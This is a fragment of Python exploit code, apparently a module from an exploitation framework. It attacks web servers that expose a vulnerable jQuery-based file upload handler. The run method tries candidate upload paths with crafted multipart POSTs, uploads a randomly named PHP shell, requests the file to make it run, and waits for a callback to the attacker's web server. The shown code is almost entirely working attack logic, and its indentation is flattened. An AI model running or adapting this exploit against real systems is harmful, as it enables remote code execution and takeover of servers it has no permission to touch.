if self.webserverport:
#let's accept a connection if this is an RFI exploit
#we should have timed out on the top connection
ret = self.server.accept()
if ret:
self.log("Found callback to our web server: %s!" % ret)
else:
self.log("Recved result of: %s" % data)
ret = self.ISucceeded()
return ret
def run(self):
self.getargs()
#test = self.test()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.hostname, self.port))
logging.info("Attacking %s:%d" % (self.hostname, self.port))
logging.info("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
auth = None
if self.basicauth_user != "":
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
fname_shell = randomstring(
16
) + ".php" #''.join(random.choice(string.ascii_letters) for _ in range(16)) #
fname_multipart_data = self.getfile(fname_shell)
found_path = False
useragentstring = ''
vulnerable_path = ''
for jquery_path in self.jquery_paths:
useragentstring = protocol + "://" + self.host + ":" + str(
self.port) + "/" + self.basepath
UA = spkproxy.UserAgent(useragentstring,
auth=auth,
hostname=self.hostname,
exploit=self)
for vulpath in self.vulnpaths:
UA.addHeader(
"Content-Type",
"multipart/form-data; boundary=---------------------------3922242971797626524322043819"
)
vulnerable_path = jquery_path + vulpath
logging.info(
"Checking for vulnerable path: {}".format(useragentstring +
vulnerable_path))
response, response_code = UA.POST(vulnerable_path,
fname_multipart_data,
return_response_code=True)
if response_code == 200:
found_path = True
break
vulnerable_path = jquery_path + vulpath + "/" + randomstring(
10)
logging.info(
"Checking for vulnerable path: {}".format(useragentstring +
vulnerable_path))
response, response_code = UA.POST(vulnerable_path,
fname_multipart_data,
return_response_code=True)
if response_code == 200:
found_path = True
break
if found_path:
logging.warning(
"Found vulnerable path: {}".format(useragentstring +
vulnerable_path))
break
# Wait for the upload
time.sleep(3)
ret = 0
if found_path:
UA.clearHeaders()
for upload_path in self.upload_paths:
test_path = jquery_path + upload_path + fname_shell
logging.info("Triggering our uploaded callback: {}".format(
useragentstring + test_path))
UA.GET(test_path, noresponse=True)
for i in xrange(0, 5): #wait five seconds for callback
time.sleep(1)
ret = self.ISucceeded()
if ret:
break
if ret:
break
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
